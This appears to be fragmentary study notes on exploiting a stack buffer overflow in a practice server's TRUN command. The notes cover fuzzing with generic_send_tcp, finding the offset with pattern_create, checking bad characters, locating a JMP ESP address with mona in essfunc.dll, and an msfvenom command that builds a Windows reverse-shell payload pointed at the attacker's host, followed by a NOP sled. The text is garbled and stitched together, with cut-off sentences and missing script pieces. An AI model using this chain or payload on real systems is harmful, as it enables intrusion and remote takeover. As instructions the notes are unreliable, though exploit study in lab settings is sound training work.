generic_send_tcp
^ send a TCP request with our characters and test it
Now we create a file {something}.spk and put this in there:
generic_send_tcp {ip} {port} file.spk 0 0
TRUN command appears to be vulnerable
/usr/share/metasploit-framework/exploit/pattern_create.rb
Command used:
offset
with the characters and remove the while
loop (offset is buffer in the old script) Script should look like this:+ badchars
to shellcode
C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands
Type !mona modules
in the Immunity Debugger
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
We want to convert Assembly code to Hex
Type command JMP ESP
-> take FFE4
!mona modules
to !mona find -s "\xff\xe4" -m essfunc.dll
badchars
-> Change "B" *4 to "\xaf\x11\x50\x62"
msfvenom -p windows/shell_reverse_tcp LHOST={OUR IP} LPORT={OUR PORT} EXITFUNC=thread -f c -a x86 -b "\x00"
+ overflow
+ "\x90" * 32
before the `+overflow+